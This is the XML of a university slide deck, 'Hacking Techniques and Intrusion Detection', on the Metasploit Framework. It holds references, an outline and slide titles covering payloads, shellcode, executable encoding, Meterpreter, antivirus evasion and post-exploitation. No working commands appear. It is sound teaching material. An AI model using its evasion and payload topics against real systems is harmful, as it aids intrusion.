              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Armitage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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.fastandeasyhacking.com/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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirusTotal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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.virustotal.com/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pPr>
              <a:buClr>
                <a:srgbClr val="C0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Facts and myths about antivirus evasion with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://schierlm.users.sourceforge.net/avevasion.html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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://en.wikibooks.org/wiki/MetasploitUnderstanding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pPr>
              <a:buClr>
                <a:srgbClr val="C0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Windows at a deeper level - Sessions, Window Stations, and Desktops, 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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.brianbondy.com/blog/id/100/understanding-windows-at-a-deeper-level-sessions-window-stations-and-desktops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pPr>
              <a:buClr>
                <a:srgbClr val="C0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"Railgun - Turn ruby into a weapon", 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  <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://dev.metasploit.com/redmine/projects/framework/wiki/Railgun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pPr>
              <a:buClr>
                <a:srgbClr val="C0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Start security center service from command prompt, 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  <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://www.windows-commandline.com/2009/07/start-security-center-service-from.html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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit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 Guide, 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  <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.com/files/119280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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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C00000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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C00000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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C00000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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C00000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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Outline - 1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What is MSF?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a: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 Framework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Architecture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Components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Libraries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Interfaces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Modules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Utilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Plugins</a:t>
            </a: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MSF Core Commands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Outline - 2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MSF Database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Basic Usage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Auxiliary Modules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Payloads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Generating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Shellcodes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Creating Executable Files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Encoding Executables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Multi Handler Exploit</a:t>
            </a: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Meterpreter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How it works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Design Goals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MSF Evasion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DEMO(s)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What is MSF?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Not just an open-source tool! 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It’s an Exploitation Framework designed for security researchers and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pentesters</a:t>
            </a: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 with a uniform model for rapid development of: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Recon,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Exploits,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Payloads,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Encoders,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Vulnerability Testing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Post-Exploitation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Pivoting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Others? (please add)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MSF Architecture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 descr="msfArc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7650" y="1219200"/>
            <a:ext cx="8648700" cy="54864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MSF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The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Metasploit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Framework is a modular system based on a few core components: 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Libraries,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interfaces, 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modules, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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mixins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and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plugins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.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12597</TotalTime>
  <Words>2025</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>428</Paragraphs>
  <Slides>46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Hacking Techniques &amp; Intrusion Detection</vt:lpstr>
      <vt:lpstr>All materials is licensed under a Creative Commons “Share Alike” license.</vt:lpstr>
      <vt:lpstr># whoami</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Outline - 1</vt:lpstr>
      <vt:lpstr>Outline - 2</vt:lpstr>
      <vt:lpstr>What is MSF?</vt:lpstr>
      <vt:lpstr>MSF Architecture</vt:lpstr>
      <vt:lpstr>MSF Components</vt:lpstr>
      <vt:lpstr>MSF Libraries</vt:lpstr>
      <vt:lpstr>Metasploit Interfaces</vt:lpstr>
      <vt:lpstr>MSF Modules</vt:lpstr>
      <vt:lpstr>MSF Utilities</vt:lpstr>
      <vt:lpstr>MSF Plugins</vt:lpstr>
      <vt:lpstr>MSF Plugins – Cont.</vt:lpstr>
      <vt:lpstr>MSF Plugins – Cont.</vt:lpstr>
      <vt:lpstr>MSF Core Commands</vt:lpstr>
      <vt:lpstr>MSF Core Commands - 2</vt:lpstr>
      <vt:lpstr>MSF Core Commands - 3</vt:lpstr>
      <vt:lpstr>MSF Database</vt:lpstr>
      <vt:lpstr>MSF DB Basic Usage</vt:lpstr>
      <vt:lpstr>DB Tips</vt:lpstr>
      <vt:lpstr>Auxiliary Modules</vt:lpstr>
      <vt:lpstr>Payloads</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Payloads Types</vt:lpstr>
      <vt:lpstr>Generating Shellcode using msfconsole</vt:lpstr>
      <vt:lpstr>Generating Shellcode using msfpayload</vt:lpstr>
      <vt:lpstr>Creating Executable Files</vt:lpstr>
      <vt:lpstr>Encode Executables -1</vt:lpstr>
      <vt:lpstr>Encode Executables -2</vt:lpstr>
      <vt:lpstr>multi/handler Exploit</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>How Meterpreter Works</vt:lpstr>
      <vt:lpstr>Meterpreter Design Goals</vt:lpstr>
      <vt:lpstr>MSF Evasion</vt:lpstr>
      <vt:lpstr>Demo Time!</vt:lpstr>
      <vt:lpstr>MSF Basics</vt:lpstr>
      <vt:lpstr>Post Exploitation - Windows</vt:lpstr>
      <vt:lpstr>Post Exploitation - Linux</vt:lpstr>
      <vt:lpstr>Misc</vt:lpstr>
      <vt:lpstr>Assignments (Choose 2)</vt:lpstr>
      <vt:lpstr>SUMMARY - 1</vt:lpstr>
      <vt:lpstr>SUMMARY - 2</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References - 2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Hacking Techniques and Intrusion Detection</dc:title>
  <dc:subject>Metasploit</dc:subject>
  <dc:creator>Dr. Ali Al-Shemery</dc:creator>
  <dc:description>MSF Crash Course</dc:description>
  <cp:lastModifiedBy>user1</cp:lastModifiedBy>
  <cp:revision>712</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-01-30T00:00:53Z</dcterms:modified>
</cp:coreProperties>
</file>